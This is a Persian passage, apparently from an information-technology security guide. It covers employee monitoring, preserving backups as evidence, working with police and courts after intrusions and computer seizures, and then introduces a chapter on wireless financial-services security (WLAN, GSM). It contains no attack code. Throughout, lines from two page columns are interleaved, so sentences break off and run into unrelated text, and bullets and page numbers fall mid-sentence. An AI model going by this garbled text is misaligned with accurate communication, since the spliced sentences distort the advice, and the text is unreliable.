ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺑﻌﻀﻲ ﻣﺪﺍﺭﻙ ﺩﺭ ﺑﺎﺯﺭﺳـﻴﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﻄﻠﻊ ﻛﻨﻴﺪ )ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑـﺎ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ
ﺭﺳﻤﻲ ﺳﻨﺪﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻤﺎ ﻧﻘﺾ ﻧﻤﻲ ﺷﻮﺩ( .ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ
ﺍﺳﺖ ﺑﺎﺯﺭﺳﺎﻥ ﺑﺎ ﻣـﺸﺎﻫﺪﺓ ﺩﺧﺎﻟـﺖ ﺷـﻤﺎ ﺩﺭ ﺗﺤﻘﻴﻘـﺎﺕ، ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻓﺸﺮﺩﻩﺷﺪﻥ ﻛﻠﻴﺪﻫﺎ ،ﻭ ﺩﺳﺘﺮﺳـﻲ
ﻧﺴﺒﺖ ﺑﻪ ﺷﻤﺎ ﺩﻳﺪ ﻣﻨﻔﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ. ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺷﻮﺩ .ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ
ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﺍﻣـﻀﺎﻱ ﺗﻮﺍﻓﻘﻨﺎﻣـﻪﺍﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ • ﻧﺸﻮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻈﺎﺭﺕ ﺑﺮ ﻛﺎﺭﻫﺎﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﻫـﻢ
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻳــﺸﺎﻥ ﺩﺭ ﻗﺒــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺣــﺴﺎﺱ ،ﻛــﺎﺭﺑﺮﺩ ﺑﻌﻨﻮﺍﻥ ﻧﻘﺾ ﻗﻮﺍﻧﻴﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺗﻠﻘﻲ ﺷﻮﺩ.
ﺭﺍﻳﺎﻧﻪ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺩﻳﮕـﺮ ﻣـﺴﺎﺋﻞ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺧـﻮﺏ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ •
ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻌـﺪﻫﺎ ﻣﻄـﺮﺡ ﺷـﻮﻧﺪ ﻣﻠـﺰﻡ ﺟﺎﻱ ﺍﻣﻨﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﺍﮔـﺮ ﺑـﺮﺍﻱ ﻛـﺸﻒ ﺣﻘﻴﻘـﺖ
ﻧﻤﺎﻳﻴﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﺻـﺮﻳﺢ ﻭ ﻻﺯﻡ ﺍﺳﺖ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻮﺭﺩ ﻣﻘﺎﻳﺴﻪ ﻗﺮﺍﺭ
ﻋﺎﺩﻻﻧﻪ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺁﻥ ﺁﮔـﺎﻫﻲ ﺩﺍﺭﻧـﺪ ﻭ ﺩﻫﻴﺪ ﺑﺎﻳﺪ ﻗﺎﺩﺭ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﻧﺴﺨﻪﻫﺎ ﺩﺳﺘﺮﺳـﻲ
ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﻧﺪ .ﺗﺼﺮﻳﺢ ﻛﻨﻴـﺪ ﻛـﻪ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ .ﻧﮕﻬـﺪﺍﺭﻱ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ
ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﻫﻨﮕﺎﻡ ﭘﺎﻳـﺎﻥﻳـﺎﻓﺘﻦ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻌﺪﻫﺎ ﻧﺘـﻮﺍﻥ ﺍﺯ ﺁﻧﻬـﺎ
ﺩﻭﺭﺓ ﻛﺎﺭﻱ ﭘﺎﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠـﺎﺯ ﺑﻌﻨﻮﺍﻥ ﻣﺪﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺩﺭ ﺧﻼﻝ ﻳﺎ ﭘـﺲ ﺍﺯ ﭘﺎﻳـﺎﻥ ﺩﻭﺭﺓ ﻛـﺎﺭﻱ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ
ﺩﺭﺻﻮﺭﺕ ﻣﺸﺎﻫﺪﺓ ﻫﺮﮔﻮﻧﻪ ﻣﻮﺭﺩ ﻣﺸﻜﻮﻙ ﻳﺎ ﺍﺗﻔﺎﻗﻲ ﻛﻪ •
ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﻧﻴﺎﺯ ﺑﻪ ﺩﺧﺎﻟﺖ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﺩﺍﺭﺩ ،ﻳﺎﺩﺩﺍﺷـﺖﺑـﺮﺩﺍﺭﻱ ﺭﺍ
ﺷﺮﻭﻉ ﻛﻨﻴﺪ .ﻣﺸﺎﻫﺪﺍﺕ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭ ﺯﻣﺎﻥ ﻫﺮﻳﻚ
ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻧﻤﺎﻳﻴﺪ .ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻭ ﺭﺩﮔﻴﺮﻱﻫﺎ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٨٤
ﺑﺎ ﻛﻤـﻚ ﻭﻛﻴـﻞ ﻭ ﺷـﺮﻛﺖ ﺑﻴﻤـﺔ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎ، • ﻣﺨﺎﻃﺮﺍﺕ ﺟﻨﺎﻳﻲ ﺩﺭ ﺣﻮﺯﺓ ﺗﺠﺎﺭﺕ
ﺗﺤﻘﻴﻘﺎﺕ ﻣﺮﺗﺒﻂ ،ﻭ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﻣﺮﺑﻮﻁ ﻛﻪ ﺑﺎﻳـﺪ ﻫﻨﮕـﺎﻡ
ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ISPﻫﺴﺘﻴﺪ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺻﻮﺭﺗﻲ ﺩﺭ
ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺗﺪﻭﻳﻦ
ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺍﺭﻳـﺪ ،ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﺯ
ﻛﻨﻴﺪ.
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺎﺩﺭﺳﺖ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺧﻮﺩﺗـﺎﻥ
ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ ﻛـﻪ ﺷﺎﻳـﺴﺘﮕﻲ ﺩﺍﺭﻧـﺪ ﺭﻭﻱ • ﺗﺤﺖ ﺗﻌﻘﻴﺐ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﻘﻴﻖ ﻛﻨﻨﺪ ﺭﺍ ﻣـﻮﺭﺩ ﺷﻨﺎﺳـﺎﻳﻲ ﻗـﺮﺍﺭ
ﺍﮔﺮ ﻣﻘﺎﻣﺎﺕ ﻗﻀﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺑﺮﺳﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﻤﺎ
ﺩﻫﻴﺪ؛ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻳﺸﺎﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ ،ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻳﺘـﺎﻥ ﺭﺍ
ﺗﻮﺳﻂ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ،ﺍﻧﺘﻘـﺎﻝ ﻭ
ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﻣﻴﺎﻥ ﺑﮕﺬﺍﺭﻳـﺪ .ﭼﻨﺎﻧﭽـﻪ
ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﻃﺒﻘﻪ ﺑﻨـﺪﻱ ﺷـﺪﻩ )ﺍﻋـﻢ ﺍﺳـﺮﺍﺭ ﺗﺠـﺎﺭﻱ ،ﺗـﺼﺎﻭﻳﺮ
ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﻣﺸﻜﻠﻲ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻳﺪ ﻛﻪ ﻻﺯﻡ ﺑـﻮﺩ ﺩﺭ ﺁﻥ
ﻣﺴﺘﻬﺠﻦ ﻛﻮﺩﻛﺎﻥ ،ﻭ (...ﻳـﺎ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻣـﻮﺭﺩ
ﺍﺯ ﻛﻤﻚ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑﻬـﺮﻩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺣﻜـﻢ
ﺑﮕﻴﺮﻳﺪ ،ﻳﻚ ﺁﺷﻨﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺗﻮﻗﻴﻒ ،ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ ﻣـﺼﺎﺩﺭﻩ ﺷـﻮﻧﺪ .ﺍﮔـﺮ ﺩﺭ ﺧـﻼﻝ
ﺑﺴﻴﺎﺭ ﻛﺎﺭﺳﺎﺯ ﺑﺎﺷﺪ.
ﺗﺤﻘﻴﻖ ﺑﺘﻮﺍﻧﻴﺪ ﺛﺎﺑﺖ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻛﺎﺭﻣﻨﺪ ﺑـﻪ ﺳﻴـﺴﺘﻢ
ﭘﻴﻮﺳﺘﻦ ﺑﻪ ﺟﻮﺍﻣﻊ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﻣـﺪﺍﻭﻡ ﺩﺭ • ﺷﻤﺎ ﻣﺤﺪﻭﺩ ﺑﻮﺩﻩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﻳﺮﺓ ﺍﻳﻦ ﺗﻮﻗﻴﻒﻫﺎ ﻛﺎﻫﺶ ﭘﻴﺪﺍ
ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺑﻪ ﺍﻓـﺮﺍﺩ ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ ﻣـﻲﺩﻫﻨـﺪ ﺗـﺎ ﻛﻨﺪ ،ﺍﻣﺎ ﺑﺎﺯ ﻫﻢ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺑﺨﺸﻲ ﺍﺯ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺷﻤﺎ ﻃـﻲ
ﺗﺨﺼﺺ ﺁﻧﻬﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑـﺪ ﺭﺍ ﻓﺮﺍﻣـﻮﺵ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺳﻤﻲ ﺩﺭ ﺗﻮﻗﻴﻒ ﺑﺎﻗﻲ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ.
ﻧﻜﻨﻴﺪ.
ﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﭘﺬﻳﺮﻓﺘﻪﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻛﺸﻮﺭ،
ﺍﮔﺮ ﭘﻠﻴﺲ ﻣﺤﻠﻲ ﻳﺎ ﻣﻘﺎﻣﺎﺕ ﻛـﺸﻮﺭﻱ ﻣﻌﺘﻘـﺪ ﺑﺎﺷـﻨﺪ ﻣـﺪﺍﺭﻛﻲ
ﻣﺒﻨﻲ ﺑﺮ ﺗﺨﻄﻲ ﺍﺯ ﻗﺎﻧﻮﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻳـﻚ ﻗﺎﺿـﻲ ﺗﻘﺎﺿـﺎﻱ
ﻣﺠﻮﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺿﻲ ﻧﻴﺰ ﺣﻜـﻢ ﺗﺤﻘﻴـﻖ
ﺻــﺎﺩﺭ ﻣــﻲﻧﻤﺎﻳــﺪ .ﺩﺭ ﺳــﺎﻟﻬﺎﻱ ﺍﺧﻴــﺮ ﺗﻌــﺪﺍﺩﻱ ﺍﺯ ﺑﺎﺯﺭﺳــﺎﻥ ﻭ
ﻣﺴﺌﻮﻻﻥ ﻛﺸﻮﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ،ﺩﺭ ﺑﺮﺧﻲ ﺍﻳﺎﻟﺘﻬﺎ ﺟﺎﻳﮕﺎﻫﻲ ﺭﺍ
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﮔﺴﺘﺮﺩﻩ ﻭ ﺳﻨﮕﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﻧﺪ .ﻳـﻚ
ﺩﻟﻴﻞ ﺍﻳﻦ ﺍﻣﺮ ،ﻋﺪﻡ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﺮﺍﻱ
ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﺑـﺎ ﺍﻧﺠـﺎﻡ
ﺍﻳﻨﻜﺎﺭ ﻭ ﻧﻴﺰ ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ،ﺑﻪ ﻣﺮﻭﺭ ﺯﻣﺎﻥ ﺑﻬﺘﺮ ﺷﻮﺩ.
ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ...
ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪ ﻭ ﻧﻈـﺎﺭﺕ ﺑـﺮ •
ﺻﻔﺤﻪﻛﻠﻴﺪ ﻣﺠﻬﺰ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮ
ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﻳﺎ ﺩﺭﻳﺎﻓﺖﺷﺪﻩ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ
ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﺒﻂ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮ ﺍﺣـﺴﺎﺱ ﻛﺮﺩﻳـﺪ ﻛـﻪ ﻣـﻮﺭﺩ
ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺳﺮﻳﻌﹰﺎ ﻋﻤﻠﻴـﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ ﺿـﺒﻂ ﺭﺍ
ﺁﻏﺎﺯ ﻛﻨﻴﺪ ﻭ ﻣﻨﺘﻈﺮ ﺣﻜﻢ ﺩﺍﺩﮔﺎﻩ ﻧﺒﺎﺷﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻧﻴﺮﻭﻫﺎﻱ
ﻻ ﺑﺪﻭﻥ ﻛﺴﺐ ﺍﺟﺎﺯﻩ ﺍﺯ ﺩﺍﺩﮔﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﺍﻧﺘﻈﺎﻣﻲ ﻣﻌﻤﻮ ﹰ
ﺑﻪ ﺷﻤﺎ ﻣﺠﻮﺯﻱ ﺑﺪﻫﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺠﺮﻱ ﻗﺎﻧﻮﻥ
ﻋﻤﻞ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭﻳﺎﻓﺖ ﺣﻜـﻢ ﻗﺎﺿـﻲ ﻣﺒﻨـﻲ ﺑـﺮ ﺍﺟـﺎﺯﺓ
ﺩﺍﺩﮔﺎﻩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺪﺗﻬﺎ ﺑﻪ ﻃﻮﻝ ﺑﻴﺎﻧﺠﺎﻣﺪ.
١٨٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺳـﻠﺐ ﻛـﺮﺩﻩ ،ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﺗـﺴﺨﻴﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳﻴـﺴﺘﻢ ،ﻭ ﺳـﺎﻳﺮ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺻﻴﻪ ﺷﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺸﺎﺑﻪ ،ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ
ﭼﻨﺪﻻﻳﻪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻣـﻲﺑﺎﺷـﻨﺪ ،ﻭ ﻓﺼﻞ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﮔﺮﭼﻪ "ﺣﺠﻢ" ﻣﻌﺎﻣﻼﺗﻲ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ
ﻧﻤﺎﻳــﺎﻧﮕﺮ ﺁﻧﭽــﻪ ﺍﻣــﺮﻭﺯ ﺑﻌﻨــﻮﺍﻥ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴــﺖ ﻱ ﺍﻣﻨﻴﺘـﻲ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺑﺮ ﮔﺴﺘﺮﺩﮔﻲ ﺣﻮﺯﺓ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭ ﹺ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻫﺴﺘﻨﺪ. ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺍﺳﺖ ،ﺍﻣﺎ ﺻـﺮﻑ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ
ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻳﺮ ﺗﻘﺴﻴﻢ ﺷﺪﻩ :ﻗﺴﻤﺖ "ﺍﻟﻒ" ﺧﻮﺍﻧﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﻧﻘﺎﻁ ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺎﻧﺠﺎﻣـﺪ .ﺩﺭ ﺍﻳـﻦ
ﺭﺍ ﺑﺎ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻓﺼﻞ ﭼﻨﺪ ﻧﻜﺘﺔ ﻣﻬﻢ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ ﻛـﻪ ﺭﺍﻫﺒـﺮﺍﻥ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺁﺷﻨﺎ ﻣﻲﻛﻨﺪ؛ ﻗﺴﻤﺖ "ﺏ" ﺑﻪ ﻣﻌﺮﻓﻲ ﺳﻴﺴﺘﻢ )ﺑﺨﺼﻮﺹ ﺩﺭ ﺑﺎﻧﻜﻬﺎ( ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ
ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﻣﻲ ﭘﺮﺩﺍﺯﺩ؛ ﻗـﺴﻤﺖ "ﺝ" ﻧﻘـﺎﻁ ﻻ ﺑـﺪﻭﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩ ﻫﺰﻳﻨـﺔﺗﺎ ﺑﻴﺸﺘﺮﻳﻦ ﺣﺪ ﻣﻤﻜﻦ ﻭ ﻣﻌﻤﻮ ﹰ
ﺿﻌﻒ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺑـﻲﺳـﻴﻢ ) ١٣٣(WLANsﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﺗﻤﺎﻡﺷﺪﻩ ،ﺁﻧﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ .ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﻓـﺼﻞ
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺁﻧﻬـﺎ ﻻﺯﻡ ﻫـﺴﺘﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ،ﺑﻪ ﻧﻮﻋﻲ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ
ﺷﺮﺡ ﻣﻲﺩﻫﺪ؛ ﻗﺴﻤﺖ "ﺩ" ﺑـﻪ ﺗﻜﺎﻣـﻞ ﺷـﺒﻜﻪ ﻫـﺎﻱ ﺳﺮﺍﺳـﺮﻱ ﺩﺭ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﺭﺍ ﻧﻴـﺰ ﺩﺭ ﺑـﺮ
ﻣﺨﺎﺑﺮﺍﺕ ﺳﻴﺎﺭ )ﺷﺒﻜﻪﻫﺎﻱ ١٣٤(GSMﻭ ﺁﺳﻴﺒﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬـﺎ ﻣﻲﮔﻴﺮﺩ.
ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻗﺴﻤﺖ "ﻩ" ﺟﺰﺋﻴﺎﺕ ﺭﻭﺷـﻬﺎﻱ ﺻـﺤﻴﺢ ﻣﻮﺍﺟﻬـﻪ ﺑـﺎ
ﻣﺨﺎﻃﺮﺍﺕ ﺷﺒﻜﻪﻫﺎﻱ GSMﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲ ﺩﻫـﺪ؛ ﻗـﺴﻤﺖ "ﻭ" ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ
